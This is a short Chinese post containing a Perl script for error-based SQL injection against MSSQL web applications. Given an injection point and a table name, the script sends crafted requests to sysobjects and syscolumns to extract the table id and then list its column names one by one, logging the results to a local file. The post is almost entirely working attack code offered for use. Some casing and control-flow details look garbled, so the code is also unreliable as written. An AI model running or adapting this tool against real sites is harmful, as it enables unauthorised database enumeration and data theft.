perl在mssql注入中爆表列

韩小末

#!/usr/bin/perl -w
#codz by n3tl04d
#date 2008-4-13


use strict;
use lwp;

if(@argv != 2){
    print "用法：$0 注入点 表名";
    exit;
}

my $browser;
my $start=time();
my $talbe=$argv[1];
my $vul=$argv[0];

sub do_get {
  $browser = lwp::useragent->new unless $browser;
  my $resp = $browser->get(@_);
  return ($resp->content, $resp->status_line, $resp->is_success, $resp)
    if wantarray;
  return unless $resp->is_success;
  return $resp->content;
}

my $tabl="$vul%20and%200<>(select%20count(*)%20from%20congaltan.dbo.sysobjects%20where%20xtype='u'%20and%20name='".$talbe."'%20and%20uid>(str(id)))";
my ($content, $status, $is_success) = do_get($tabl);

if ($content =~ m{value \'(.+?)\'}gi)
    {
        print "地到表id:$1\n";
  open(file,">>e:/perl/count.txt") || die ("could not open file");
  print file "===============================================================\n表名:$talbe id:$1\n";
  close(file);
  crake($1);
    } else {
  print "不能爆表\n";
  last;
 }

sub crake {
 my @arr1=();
 for (my $j=1;$j<=470;$j++) {
 print "猜解第$j个表列\n";
 my @arr=join("','",@arr1);
 my $url="$vul%20and%200<>(select%20top%201%20name%20from%20congaltan.dbo.syscolumns%20where%20id=$_[0]%20and%20name%20not%20in('@arr'))";
   
    my ($content, $status, $is_success) = do_get($url);
 if ($content =~ m{value \'(.+?)\'}gi)
  {
    print "地到表列:$1\n";
    push(@arr1,$1);
    save($1);
  } else {
   print "猜解完成\n";
   last;
  }  
 }
}


my $end=time();
my $time=$end-$start;
print "用时".$time."秒\n";

sub save {
  open(file1,">>e:/perl/count.txt") || die ("could not open file");
  print file1 "-$_[0]\n";
  close(file1);

}